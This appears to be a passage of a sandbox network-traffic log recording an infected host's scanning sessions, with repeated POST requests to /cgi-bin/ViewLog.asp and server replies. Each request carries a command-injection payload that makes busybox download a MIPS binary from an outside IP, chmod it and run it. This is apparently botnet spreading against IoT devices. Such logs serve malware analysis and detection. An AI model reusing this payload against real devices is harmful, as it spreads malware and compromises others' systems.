                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.704904079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              618192.168.2.143351631.43.191.1778080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.018932104 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.202760935 CET360INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:17:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              619192.168.2.145534494.23.18.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.250792027 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              620192.168.2.144541231.136.72.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.260395050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.369510889 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.513274908 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.544836044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              621192.168.2.145795231.131.0.1338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.298129082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.393481016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.614854097 CET136INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:18:03 GMT
                                              Connection: Close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              622192.168.2.143864431.200.111.1718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.300875902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              623192.168.2.143552694.120.47.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.337541103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              624192.168.2.145990662.202.157.848080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.439759016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              625192.168.2.145479462.214.155.1868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.442934990 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.635452986 CET374INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 Nov 2023 04:17:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 153
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
                                              Nov 23, 2023 05:18:00.129900932 CET374INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 Nov 2023 04:17:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 153
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              626192.168.2.145534631.172.66.1128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.467962027 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.689258099 CET504INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:59 GMT
                                              Server: Apache/2.4.29 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              627192.168.2.144044031.200.49.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.470630884 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              628192.168.2.144437494.121.151.2528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.473961115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              629192.168.2.144338062.29.24.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.474447012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              630192.168.2.144441094.123.250.528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.491859913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              631192.168.2.145605295.60.149.2188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.463609934 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.711703062 CET434INHTTP/1.1 302 Found
                                              Date: Thu, 23 Nov 2023 04:18:00 GMT
                                              Location: /
                                              Content-Length: 185
                                              Keep-Alive: timeout=15, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="/">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              632192.168.2.144083894.140.4.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:00.643726110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
